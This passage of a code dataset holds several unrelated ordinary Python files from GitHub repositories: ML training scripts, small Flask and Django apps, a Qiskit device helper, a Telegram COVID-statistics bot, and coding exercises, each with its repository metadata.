tf.argmax(output_teacher, 1))\n    correct_prediction_student = tf.equal(tf.argmax(Y, 1), tf.argmax(output_student, 1))\n\n    accuracy_teacher = tf.reduce_mean(tf.cast(correct_prediction_teacher, tf.float32))\n    accuracy_student = tf.reduce_mean(tf.cast(correct_prediction_student, tf.float32))\n\n    init_vars = tf.global_variables_initializer()\n\n    saver = tf.train.Saver()\n\n    with tf.Session() as sess:\n        sess.run(init_vars)\n\n        if do_train:\n            logger.info('Student Net is learning.')\n            for cnt in range(epoch_student_individual):\n                train_images, train_labels = mnist.train.next_batch(batch_size)\n                _, cost_student = sess.run([opt_student, loss_student],\n                                           feed_dict={X: train_images, Y: train_labels})\n                if cnt % (epoch_student_individual // 5 + 1) == 0:\n                    logger.info('Student loss: {}'.format(cost_student))\n            acc_student_individual = sess.run(accuracy_student,\n                                              feed_dict={X: mnist.test.images, Y: mnist.test.labels})\n            logger.info('Student INDIVIDUAL Accuracy: {}'.format(acc_student_individual))\n\n            logger.info('Teacher Net is learning.')\n            for cnt in range(epoch_teacher):\n                train_images, train_labels = mnist.train.next_batch(batch_size)\n                _, cost_teacher = sess.run([opt_teacher, loss_teacher],\n                                           feed_dict={X: train_images, Y: train_labels})\n\n                _, cost_student = sess.run([opt_student, loss_student],\n                                           feed_dict={X: train_images, Y: train_labels})\n                if cnt % (epoch_teacher // 5 + 1) == 0:\n                    logger.info('Teacher loss: {}'.format(cost_teacher))\n            acc_teacher = sess.run(accuracy_teacher,\n                                   feed_dict={X: mnist.test.images, Y: mnist.test.labels})\n            logger.info('Teacher Accuracy: {}'.format(acc_teacher))\n            logger.info('Saving models...')\n            saver.save(sess, CKPT)\n\n        if do_learn:\n            logger.info('Restoring models...')\n            saver.restore(sess, CKPT)\n            logger.info('Teacher is teaching Student.')\n            acc_student_individual = sess.run(accuracy_student,\n                                              feed_dict={X: mnist.test.images, Y: mnist.test.labels})\n            logger.info('Student INDIVIDUAL Accuracy: {}'.format(acc_student_individual))\n            for cnt in 
range(epoch_student_learning):\n                train_images, _ = mnist.train.next_batch(batch_size)\n                _, cost_student = sess.run([opt_student_learning, loss_student_learning],\n                                           feed_dict={X: train_images})\n                if cnt % (epoch_student_learning // 5 + 1) == 0:\n                    logger.info('Student loss: {}'.format(cost_student))\n            acc_student_learning = sess.run(accuracy_student,\n                                            feed_dict={X: mnist.test.images, Y: mnist.test.labels})\n            logger.info('Student LEARNING Accuracy: {}'.format(acc_student_learning))\n            enhancement = acc_student_learning - acc_student_individual\n            logger.info('Accuracy gained: {}'.format(enhancement))\n            return enhancement\n\n\nif __name__ == '__main__':\n    logger.info(args)\n    temperature = args.temperature\n    batch_size = args.batch_size\n    epoch_teacher = args.epoch_teacher\n    epoch_student_individual = args.epoch_student_individual\n    epoch_student_learning = args.epoch_student_learning\n\n    # If temperature > 0, calculate the enhancement under cmd params; else draw the fig.\n    if temperature > 0:\n        logger.info('Calc the enhancement.')\n        train(temperature, batch_size, epoch_teacher, epoch_student_individual, epoch_student_learning)\n    else:\n        import numpy as np\n        from matplotlib import pyplot as plt\n\n        logger.info('Draw the relationship between T and according enhancement.')\n        start = 0 if os.path.exists(CKPT_VALID) else 1\n        x = np.linspace(-10, 10, num=1000)\n        y = list()\n        for temperature in x:\n            y.append(train(temperature, batch_size, epoch_teacher, epoch_student_individual, epoch_student_learning))\n\n        plt.xlabel('T')\n        plt.ylabel('Enhancement %')\n        y = np.array(y)\n        idx = np.where(y == max(y))\n        plt.title('MAX E={}%, at T={}'.format(round(float(y[idx] * 100), 4), round(float(x[idx]), 2)))\n        plt.plot(x[start:], y[start:] * 100)\n        plt.savefig('result.png')\n        plt.show()\n","repo_name":"wtupc96/Recoding-papers","sub_path":"Distilling_the_knowledge_in_a_Neural_Network/teach_nets_soft_targets.py","file_name":"teach_nets_soft_targets.py","file_ext":"py","file_size_in_byte":9464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5008218556","text":"import numpy as np\nimport moderngl as mgl\n\nfrom mglg.graphics.camera import Camera\nfrom mglg.graphics.drawable import Drawable2D\nfrom mglg.math.vector import Vector4f\n\n\ndef make_fill_verts():\n    # 100 pairs (200 total)\n    out = np.zeros((200, 2), dtype=np.float32)\n    out[:, 0] = np.repeat(np.arange(-0.5, 0.5, 1/100, dtype=np.float32), 2)\n    out[::2, 1] = 0.05\n    out[1::2, 1] = -0.05\n    return out\n\n\nclass FillBar(Drawable2D):\n    def __init__(self, context, shader,\n                 fill_color=1, empty_color=[0, 0, 0, 1],\n                 *args, **kwargs):\n        super().__init__(context, shader, *args, **kwargs)\n\n        vertices = np.zeros((200, 4), dtype=np.float32)\n        vertices[:, :2] = make_fill_verts()\n        vert_vbo = context.buffer(vertices.ravel().view(np.ubyte))\n        self.fill_color = Vector4f(fill_color)\n        self.empty_color = Vector4f(empty_color)\n        self._colors = np.zeros(200, dtype=[('color', np.float32, 4)])\n        self._colors['color'][:] = fill_color\n        self._pending_percentage = self._percentage = self.percentage = 100\n        self._dirty_percentage = False\n\n        self._color_vbo = context.buffer(self._colors.view(np.ubyte), dynamic=True)\n        self.vao = context.vertex_array(shader,\n                                        [\n                                            (vert_vbo, '4f', 'vertices'),\n                                            (self._color_vbo, '4f', 'color')\n                                        ])\n\n    def draw(self, camera: Camera):\n        if self.visible:\n            if self._percentage != self._pending_percentage:\n                self.update_fill_color(self._pending_percentage)\n                self._color_vbo.write(self._delta_view, 
offset=self._offset)\n np.dot(self.model_matrix, camera.vp, self.mvp)\n self.shader['mvp'].write(self._mvp_ubyte_view)\n self.vao.render(mgl.TRIANGLE_STRIP)\n\n @property\n def percentage(self):\n return self._percentage\n\n @percentage.setter\n def percentage(self, value):\n if value > 100 or value < 0:\n raise ValueError('Invalid percentage.')\n self._pending_percentage = int(value)\n\n def update_fill_color(self, new_percentage):\n old_percentage = self._percentage\n delta = new_percentage - old_percentage\n op2, np2 = old_percentage*2, new_percentage*2\n if delta > 0: # moving division to right (filling up)\n self._colors['color'][op2:np2] = self.fill_color\n slc = slice(op2, np2, None)\n else: # moving division to left (filling down)\n self._colors['color'][np2:op2 + 1] = self.empty_color\n slc = slice(np2, op2+1, None)\n self._delta_view = self._colors[slc].view(np.ubyte)\n self._offset = slc.start * 16\n self._percentage = new_percentage\n\n\nif __name__ == '__main__':\n from mglg.graphics.shaders import VertexColorShader\n from gonogo.visuals.window import ExpWindow as Win\n from time import sleep\n\n win = Win()\n per_vert = VertexColorShader(win.context)\n fill_bar = FillBar(win.context, per_vert, fill_color=[0.3, 0.8, 0.2, 1],\n empty_color=[0.2, 0.2, 0.2, 1], scale=1, rotation=90)\n for i in range(100):\n fill_bar.percentage -= 1\n fill_bar.draw(win.cam)\n win.flip()\n for i in range(100):\n fill_bar.percentage += 1\n fill_bar.draw(win.cam)\n win.flip()\n sleep(0.4)\n","repo_name":"aforren1/go-no-go","sub_path":"gonogo/visuals/fill_bar.py","file_name":"fill_bar.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26000712162","text":"import logging\n\nlogger = logging.getLogger('root')\n\nfrom copy import deepcopy\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\n\nfrom abp.adaptives.common.memory import Memory, Experience\nfrom abp.utils import clear_summary_path\nfrom abp.models import ActorModel\nfrom tensorboardX import SummaryWriter\n\nfrom baselines.common.schedules import LinearSchedule\n\n# TODO Too many duplicate code. 
Need to refactor!\n\nclass PGAdaptive(object):\n    \"\"\"PGAdaptive using Vanilla Policy Gradient\"\"\"\n\n    def __init__(self, name, choices, network_config, reinforce_config):\n        super(PGAdaptive, self).__init__()\n        self.name = name\n        self.choices = choices\n        self.network_config = network_config\n        self.reinforce_config = reinforce_config\n        self.update_frequency = reinforce_config.update_frequency\n\n        self.replay_memory = Memory(self.reinforce_config.batch_size)\n\n        self.steps = 0\n        self.total_reward = 0\n        self.learning = True\n\n        self.previous_state = None\n        self.previous_action = None\n        self.clear_rewards()\n\n        self.model = ActorModel(self.name + \"_actor\", self.network_config)\n        self.summary = SummaryWriter(log_dir = self.reinforce_config.summaries_path + \"/\" + self.name)\n\n        self.episode = 0\n        self.epsilon_schedule = LinearSchedule(10 * 1000, initial_p = self.reinforce_config.starting_epsilon, final_p = 0.1)\n        # Assumed importance-sampling (beta) schedule; the original code referenced\n        # self.beta_schedule in update() without ever defining it.\n        self.beta_schedule = LinearSchedule(10 * 1000, initial_p = 0.4, final_p = 1.0)\n\n    def __del__(self):\n        self.summary.close()\n\n    def predict(self, state):\n        self.steps += 1\n\n        if self.previous_state is not None and self.previous_action is not None:\n            self.replay_memory.add((self.previous_state, self.previous_action, self.current_reward, state, False))\n\n        _state = Variable(torch.Tensor(state)).unsqueeze(0)\n        action_probs = self.model.predict(_state)\n\n        #TODO continuous action\n        m = torch.distributions.Categorical(action_probs)\n        action = m.sample().item()\n\n        choice = self.choices[action]\n\n        self.update()\n\n        self.clear_rewards()\n\n        self.previous_state = state\n        self.previous_action = action\n\n        return choice, action_probs\n\n\n    def disable_learning(self):\n        logger.info(\"Disabled Learning for %s agent\" % self.name)\n        self.learning = False\n        self.model.save_network()\n        self.episode = 0\n\n\n    def end_episode(self, state):\n        if not self.learning:\n            return\n\n        logger.info(\"End of Episode %d with total reward %.2f\" % (self.episode + 1, self.total_reward))\n\n        self.episode += 1\n\n        self.summary.add_scalar(tag='%s agent reward' % self.name,scalar_value=self.total_reward,\n                                global_step=self.episode)\n\n        self.replay_memory.add((self.previous_state, self.previous_action, self.current_reward, state, True))\n\n        self.clear_rewards()\n        self.total_reward = 0\n\n        self.previous_state = None\n        self.previous_action = None\n\n        self.update()\n\n    def clear_rewards(self):\n        self.current_reward = 0\n\n    def reward(self, value):\n        self.current_reward += value\n        self.total_reward += value\n\n    def update(self):\n        if self.steps <= self.reinforce_config.batch_size:\n            return\n\n        states, actions, reward, next_states, is_terminal, weights, batch_idxes = self.replay_memory.sample(self.reinforce_config.batch_size,\n                                                                                                 self.beta_schedule.value(self.steps))\n        states = Variable(torch.Tensor(states))\n        next_states = Variable(torch.Tensor(next_states))\n\n        is_terminal = [0 if t else 1 for t in is_terminal]\n\n        self.replay_memory.clear()\n\n        # The original referenced undefined q_target/td_errors here; the sampled\n        # rewards are used as a stand-in fitting target so the update is runnable.\n        q_target = Variable(torch.Tensor(reward))\n        self.model.fit(states, q_target, self.steps)\n","repo_name":"osu-xai/abp","sub_path":"abp/adaptives/pg/adaptive.py","file_name":"adaptive.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21053000541","text":"from flask import Flask, jsonify\nfrom pymongo import MongoClient\n\napp = Flask(__name__)\n\ndef get_db():\n    client = MongoClient(host='database',\n                         port=27017)\n    db = client[\"users\"]\n    return db\n\n@app.route(\"/\")\ndef hello():\n    return \"Hello, go to /users to see all users!\"\n\n@app.route('/users')\ndef get_users():\n    db = get_db()\n    _users = db.users.find()\n    users = [{ \"name\": 
user[\"name\"], \"last_name\": user[\"last_name\"]} for user in _users]\n return jsonify({\"users\": users})\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=3001)\n","repo_name":"jtowarnicka/docker-exercises","sub_path":"docker-compose/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3086022484","text":"# O(n) Time | O(n) Space\ndef isPalindrome(string):\n \"\"\"\n Write a function that takes in a non-empty string and that returns a boolean representing whether the string is a\n palindrome.\n \"\"\"\n if string[::-1] == string:\n return True\n return False\n\n\n# O(n) Time | O(1) space\n# Takes advantage of the fact that's letter is equal to respective last letter, like a mirror reflection.\ndef isPalindromeBetter(string):\n start = 0\n end = len(string) - 1\n while start < end:\n if string[start] != string[end]:\n return False\n else:\n start += 1\n end -= 1\n return True\n","repo_name":"slail/palindrome","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15224943464","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom PIL import Image\nfrom io import BytesIO\nfrom django.core.files.storage import default_storage as storage\n# Create your models here.\n\nclass Profile(models.Model) :\n\tuser = models.OneToOneField(User, on_delete = models.CASCADE)\n\timage = models.ImageField(default = \"default.jpg\", upload_to = 'profile_pics')\n\n\tdef __str__(self):\n\t\treturn f'{self.user.username} Profile'\n\n\tdef save(self, *args, **kwargs):\n\t\tsuper().save(*args, **kwargs)\n\n\t\timg_read = storage.open(self.image.name, 'rb')\n\t\timg = Image.open(img_read)\n\n\t\tif img.height > 300 or img.width > 300 :\n\n\t\t\toutput_size = (300, 300)\n\n\t\t\timg.thumbnail(output_size)\n\n\t\t\tin_mem_file = BytesIO()\n\n\t\t\timg.convert('RGB').save(in_mem_file, format='JPEG')\n\n\t\t\timg_write = storage.open(self.image.name, 'w+')\n\n\t\t\timg_write.write(in_mem_file.getvalue())\n\n\t\t\timg_write.close\n\n\t\timg_read.close()\n\n\t\t\n\n","repo_name":"shagumnic/gameNotifyApp","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"45516861226","text":"import os\nimport pickle \n\nimport numpy as np\n\nfrom qiskit import QuantumRegister\nfrom qiskit import execute, Aer\nfrom qiskit import IBMQ\nfrom qiskit.providers.aer import noise\nfrom qiskit.ignis.mitigation.measurement import (complete_meas_cal,\n CompleteMeasFitter, \n MeasurementFilter)\n\nfrom hamiltonian import *\n\n# List of currently supported devices\nsupported_devices = [\n None, \n \"ibmq_16_melbourne\",\n \"ibmq_5_yorktown\",\n \"ibmq_burlington\",\n \"ibmq_essex\",\n \"ibmq_london\",\n \"ibmq_vigo\"\n]\n\nclass Device():\n def __init__(self, device_name=None, mitigate_meas_error=False, N_qubits=0, layout=None):\n # Default set of parameters\n self.name = device_name\n self.mitigate_meas_error = mitigate_meas_error\n self.coupling_map = None\n self.noise_model = None\n self.meas_filter = None\n self.layout = layout\n\n if layout is not None:\n assert self.name is not None, \\\n f\"Layout must None or unspecified when running without a device.\"\n if 
len(layout)!=N_qubits:\n                error_str = f\"The length of the layout list ({len(layout)}) must match the number of qubits in use ({N_qubits}).\"\n                raise ValueError(error_str)\n\n        if self.name not in supported_devices: \n            error_str = f\"Please give the name of an IBMQ machine. Options are: \\n {supported_devices}\"\n            raise ValueError(error_str)\n\n        # If we actually have a device to deal with, do everything else\n        if self.name is not None:\n            self.read_device()\n\n            if self.mitigate_meas_error:\n                if N_qubits <= 0:\n                    raise ValueError(\"Please provide number of qubits for measurement error mitigation.\")\n\n                # Because there are issues with running stuff in parallel after calling Qiskit\n                # for calibration, let's make things so that we can just save/load this data from a file. \n                if layout is not None:\n                    calibration_file = f\"device_{self.name}_calibration_{N_qubits}qubits_layout-{layout}.pkl\" \n                else:\n                    calibration_file = f\"device_{self.name}_calibration_{N_qubits}qubits.pkl\" \n\n                if calibration_file not in os.listdir('devices'):\n                    print(f\"Calibration file not found; creating calibration file at {calibration_file}\")\n                    self.meas_filter = self.initialize_meas_calibration(N_qubits, layout)\n                    with open(\"devices/\" + calibration_file, \"wb\") as out_file:\n                        pickle.dump(self.meas_filter, out_file)\n                else:\n                    print(f\"Calibration file found; reading calibration data from {calibration_file}\")\n                    with open(\"devices/\" + calibration_file, \"rb\") as in_file:\n                        self.meas_filter = pickle.load(in_file)\n        \n\n\n    def read_device(self):\n        \"\"\" Reads in noise models for IBMQ device stored in file \n        devices/device_<name>.pk and returns a tuple containing the \n        coupling map and corresponding noise model.\n        \n        If the file is not already populated, download and populate it.\n        \"\"\"\n\n        filename = f\"device_{self.name}.pk\"\n\n        # Check for device information directory, create if not there\n        if \"devices\" not in os.listdir(): \n            os.mkdir(\"devices\")\n        \n        # Check for whether we have already downloaded device information \n        if filename not in os.listdir('devices'):\n            # Log into IBMQ using stored account information \n            provider = IBMQ.load_account()\n            provider.backends()\n\n            # get device information \n            device = provider.get_backend(self.name)\n            properties = device.properties()\n\n            # Get coupling map and noise model \n            coupling_map = device.configuration().coupling_map\n            noise_model = noise.NoiseModel.from_backend(properties)\n\n            # Write tuple containing coupling map and noise model (converted to dictionary) to file \n            device_write = (coupling_map, noise_model.to_dict())\n\n            with open(f'devices/{filename}','wb') as out_file:\n                pickle.dump(device_write, out_file)\n\n        # Read data from the file\n        with open(f'devices/{filename}', 'rb') as in_file:\n            coupling_map, model_dict = pickle.load(in_file)\n\n        # Reconstruct noise model from dictionary\n        noise_model = noise.noise_model.NoiseModel.from_dict(model_dict)\n\n        # Now, we set the class variables\n        self.coupling_map = coupling_map\n        self.noise_model = noise_model\n\n\n    def initialize_meas_calibration(self, N_qubits, layout):\n        \"\"\" Set up the confusion matrix needed for measurement error mitigation.\n        This is basically just boilerplate code from the Ignis Github\n        https://github.com/Qiskit/qiskit-ignis\n        \"\"\"\n        if layout is None:\n            cal_q = QuantumRegister(N_qubits)\n            meas_cals, state_labels = complete_meas_cal(qr=cal_q)\n        else:\n            meas_cals, state_labels = complete_meas_cal(qubit_list=layout)\n\n        # Run the calibration circuits with the device noise model\n        backend = 
Aer.get_backend('qasm_simulator')\n job = execute(meas_cals, backend=backend, shots=10000, noise_model=self.noise_model)\n cal_results = job.result()\n\n return CompleteMeasFitter(cal_results, state_labels).filter\n","repo_name":"glassnotes/GrayCode-QubitEncoding","sub_path":"src/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"37819948203","text":"from flask import Flask, jsonify, request\nfrom model.requesthandler import RequestHandler\nfrom model.validator import Validator\nimport os\nrequest_handler = RequestHandler(os.path.abspath('config.ini'))\nvalidator = Validator()\napp = Flask(__name__)\napp.config['JSONIFY_PRETTYPRINT_REGULAR'] = True\n\n\n@app.route(\"/api/ping\")\ndef ping():\n return jsonify({\"success\": True}), 200\n\n@app.route(\"/api/posts\")\ndef posts():\n tags = request.args.get('tags')\n if tags == None or tags.strip(' ') == '':\n return jsonify({\"error\": 'Tag parameter is required'}), 400\n sortBy = request.args.get('sortBy')\n direction = request.args.get('direction')\n if sortBy:\n if not (validator.v_sortBy(sortBy)):\n return jsonify({\"error\": \"sortBy parameter is invalid\"}), 400\n if direction:\n if not (validator.v_direction(direction)):\n return jsonify({\"error\": 'direction parameter is invalid'}), 400\n posts = request_handler.get_posts(tags.split(','))\n sorted_posts = list(map(lambda post: post.data, request_handler.sort_posts(posts, sortBy, direction)))\n return jsonify({\"posts\" : sorted_posts}), 200\n\n@app.route(\"/api/authors\")\ndef authors():\n return jsonify({\"authors\": request_handler.get_author_data()}), 200\n","repo_name":"MostafaNW/blog-backend","sub_path":"testapp.py","file_name":"testapp.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9648412099","text":"# Telegram: @ZumbiPy __ _ ___\n# /_ / __ ____ _ / / (_) _ \\__ __\n# / /_/ // / ' \\/ _ \\/ / ___/ // /\n# /___/\\_,_/_/_/_/_.__/_/_/ \\_, /\n# E-mail: zumbipy@gmail.com /___/\n\"\"\"\n4 - Supondo que a população de um país A seja da ordem de 80000 habitantes\ncom uma taxa anual de crescimento de 3% e que a população de B seja 200000\nhabitantes com uma taxa de crescimento de 1%. 
Faça um programa que\ncalcule e escreva o número de anos necessários para que a população do país\nA ultrapasse ou iguale a população do país B, mantidas as taxas de crescimento.\n\"\"\"\n# ================================================================================\n# Variáveis do programa\n# ================================================================================\nhabitantes_a = 80000\nhabitantes_b = 200000\nanos = 0\n\n# ================================================================================\n# Lógica do programa\n# ================================================================================\nwhile habitantes_a < habitantes_b:\n    crescimento_p_a = habitantes_a * 0.03\n    crescimento_p_b = habitantes_b * 0.01\n    anos += 1\n    habitantes_a, habitantes_b = habitantes_a + crescimento_p_a, habitantes_b + crescimento_p_b\n\nprint(\"Vai levar {} anos.\".format(anos))\n","repo_name":"zumbipy/PythonExercicios","sub_path":"EstruturaDeRepeticao/estruturaderepeticao-04.py","file_name":"estruturaderepeticao-04.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"13367896506","text":"fname = input(\"Enter a file name: \")\ntry:\n    fhand = open(fname, \"r\")\nexcept:\n    print('File cannot be opened: ', fname)\n    quit()\n\ncount = 0\naverage = 0\ntotal = 0\nfor line in fhand:\n    if line.startswith(\"X-DSPAM-Confidence:\"):\n        pos = line.find(' ')\n        number = line[pos:].rstrip()\n        number = float(number)\n        count = count + 1\n        total = total + number\n        average = total / count\n\nprint(average)\n","repo_name":"tjudarbe/Learning-Python","sub_path":"Ex7.2.py","file_name":"Ex7.2.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24734319427","text":"import math\nimport telebot\nfrom telebot import types\nfrom CovidTracker import CovidTracker\n\nTOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\nbot = telebot.TeleBot(TOKEN)\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n    markup = types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=2)\n    btn1 = types.KeyboardButton('Во всём мире')\n    btn2 = types.KeyboardButton('Беларусь')\n    btn3 = types.KeyboardButton('Россия')\n    btn4 = types.KeyboardButton('Украина')\n    markup.add(btn1, btn2, btn3, btn4)\n\n    replyMsg = 'Привет ' + message.from_user.first_name + '\\n' \\\n               'Я бот Covid Tracker - слежу за данными по коронавирусу.\\n' \\\n               '\\nКак пользоваться\\n' \\\n               'Напиши название страны, к примеру США или Германия, ' \\\n               'и я расскажу, как там обстоят дела. В ответ на В мире сообщу данные по всему миру. 
' \\\n               'Популярные страны видны на кнопках.\\n' \\\n               '\\nМои команды\\n' \\\n               '/start - вновь покажет это сообщение\\n' \\\n               '/list - список стран, за которыми я слежу\\n' \\\n               '/info - о точности, источниках и прочем\\n' \\\n               '\\nИсточник данных: JHU CSSE'\n    bot.send_message(message.chat.id, replyMsg, parse_mode='html', reply_markup=markup)\n\n\n@bot.message_handler(commands=['info'])\ndef send_welcome(message):\n    replyMsg = 'Источники\\n' \\\n               'Основной источник данных - CSSE Data Repository at Johns Hopkins University, ' \\\n               'который является репозиторием данных, предоставленных WHO, ECDC, US CDC и другими организациями.\\n' \\\n               '\\nТочность\\n' \\\n               'По разным причинам не по всем странам есть возможность получить точные и актуальные данные, ' \\\n               'и иногда возникает ситуация, когда для некоторых стран данные либо отсутствуют, ' \\\n               'либо не актуальны.\\n' \\\n               '\\nВыбор страны\\n' \\\n               'Страну можно выбрать несколькими способами:\\n' \\\n               '1. По названию на русском — Япония\\n' \\\n               '2. По английскому названию — Japan\\n' \\\n               '3. По двухбуквенному коду (ISO 3166) — JP\\n' \\\n               'Для некоторых стран существуют алиасы: США, Америка, Соединенные Штаты ' \\\n               '— всё это одна страна'\n    bot.send_message(message.chat.id, replyMsg, parse_mode='html')\n\n\n@bot.message_handler(commands=['list'])\ndef send_list(message):\n    tracker = CovidTracker()\n    countriesList = tracker.getCountriesList()\n\n    # Long names\n    countriesLongList = []\n    # iterate over a copy so removing items does not skip entries\n    for name in countriesList[:]:\n        if len(name) > 18:\n            countriesLongList.append(name)\n            countriesList.remove(name)\n\n    height = math.ceil(len(countriesList) / 2)\n\n    i = 0\n    listing = ''\n    while i < height:\n        if len(countriesList[i]) < 18:\n            pad = 0\n        else:\n            pad = 1\n\n        listing += \"{:<18}\".format(countriesList[i])\n\n        if pad:\n            listing += '\\n'\n        try:\n            if pad:\n                listing += \"{:<18}\".format(' ')\n            listing += countriesList[i + height]\n        except IndexError:\n            pass\n        listing += '\\n'\n        i += 1\n\n    for name in countriesLongList:\n        listing += name + '\\n'\n\n    replyMsg = 'Вот список стран, за которыми я слежу:\\n<code>' + listing + '</code>'\n    bot.send_message(message.chat.id, replyMsg, parse_mode='html')\n\n\n@bot.message_handler(content_types=['text'])\ndef mess(message):\n    replyMsg = ''\n    userText = message.text.strip().lower()\n    userText = userText.replace('ё', 'е')\n    tracker = CovidTracker()\n\n    # World data\n    if userText in ['во всем мире', 'в мире', 'по всему миру', 'по миру', 'мир', 'world']:\n        data = tracker.getData('world', 'text')\n        replyMsg += 'Данные по всему миру:\\n' \\\n                    '<code>--------------------------------\\n' \\\n                    + data + '</code>'\n\n    # Country data\n    else:\n        country = tracker.processCountryName(userText)\n        if not country:\n            replyMsg = 'Страна \"' + message.text + '\" не найдена\\n'\n        else:\n            data = tracker.getData(country['code'], 'text')\n            replyMsg = 'Данные по стране ' + country['name'] + ':\\n' \\\n                       '<code>--------------------------------\\n' \\\n                       + data + '</code>'\n\n    bot.send_message(message.chat.id, replyMsg, parse_mode='html')\n\n\n@bot.message_handler(func=lambda message: True)\ndef echo_all(message):\n    bot.reply_to(message, 'Не пойму что это значит')\n\n\nbot.polling(none_stop=True)\n","repo_name":"decss/CovidTrackerBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5610,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"66712797","text":"from typing import List\nimport heapq\n\n\ndef is_ascending(A):\n    for i in range(0, len(A[0])):\n        previous = 'a'\n        for s in A:\n            if s[i] < previous:\n                return i\n            previous = s[i]\n    return -1\n\n\ndef minDeletionSize2(A: List[str]) -> int:\n    init = len(A[0])\n    it_is_not = is_ascending(A)\n    while it_is_not != -1:\n        for i in range(0, len(A)):\n            A[i] = A[i][:it_is_not] + A[i][it_is_not + 1:]\n            i += 1\n        it_is_not = is_ascending(A)\n    return init - len(A[0])\n\n\ndef minDeletionSize(A: List[str]) -> int:\n    res = set()\n    for j in range(len(A[0])):\n        for i in range(len(A) - 1):\n            if A[i][j] > A[i + 1][j]:\n                res.add(j)\n                break\n\n    return len(res)\n\n\nprint(minDeletionSize([\"cba\", \"daf\", \"ghi\"]))\nprint(minDeletionSize([\"a\", \"b\"]))\nprint(minDeletionSize([\"zyx\", \"wvu\", \"tsr\"]))\n\n\ndef twoCitySchedCost(costs: List[List[int]]) -> int:\n    a_or_b = []\n    res = 0\n\n    for cost in costs:\n        if cost[0] < cost[1]:\n            a_or_b.append(0)\n            res += cost[0]\n        else:\n            a_or_b.append(1)\n            res += cost[1]\n\n    times = sum(a_or_b) - len(a_or_b) // 2\n    if times == 0:\n        return res\n\n    updated_costs = []\n    for i in range(0, len(costs)):\n        if (times > 0 and a_or_b[i] == 1) or (times < 0 and a_or_b[i] == 0):\n            updated_costs.append(costs[i])\n\n    diff = []\n    for cost in updated_costs:\n        heapq.heappush(diff, abs(cost[0] - cost[1]))\n\n    times = abs(times)\n    for i in range(0, times):\n        res += heapq.heappop(diff)\n\n    return res\n\n\nprint(twoCitySchedCost([[10, 20], [30, 200], [400, 50], [30, 20]]))\nprint(twoCitySchedCost([[259, 770], [448, 54], [926, 667], [184, 139], [840, 118], [577, 469]]))\nprint(twoCitySchedCost(\n    [[518, 518], [71, 971], [121, 862], [967, 607], [138, 754], [513, 337], [499, 873], [337, 387], [647, 917],\n     [76, 417]]))\n","repo_name":"benoitantelme/pythonstuff","sub_path":"leetcode/easy/GreedyExercises.py","file_name":"GreedyExercises.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73891050661","text":"import pandas as pd\r\nimport numpy as np\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.metrics import explained_variance_score as evs\r\n\r\nfrom sklearn.ensemble import RandomForestRegressor, BaggingRegressor, HistGradientBoostingRegressor\r\n\r\n# Data Import\r\ndf = pd.read_csv('mobile_prices_2023.csv')\r\ndf = df.drop('Phone Name', axis=1)\r\n\r\n\r\n# EDA & Preprocessing\r\nprint(df.info(), ('=' * 100))\r\n\r\nprint(df.isnull().sum(), ('=' * 100))\r\ndf.dropna(inplace= True)\r\n\r\n\r\n# Label Encoder\r\nle = LabelEncoder()\r\n\r\nfor c in df.columns:\r\n    if df[c].dtype == 'object' :\r\n        df[c] = le.fit_transform(df[c])\r\n    \r\nprint(df.dtypes, ('=' * 100))\r\n\r\n\r\n# Train Test Split\r\nfeatures = df.drop('Price in INR', axis= 1)\r\ntarget = df['Price in INR']\r\n\r\nprint(features, ('=' * 100), target, ('=' * 100))\r\n\r\nX_train, X_test, Y_train, Y_test = train_test_split(features, target, test_size= 0.24, random_state= 
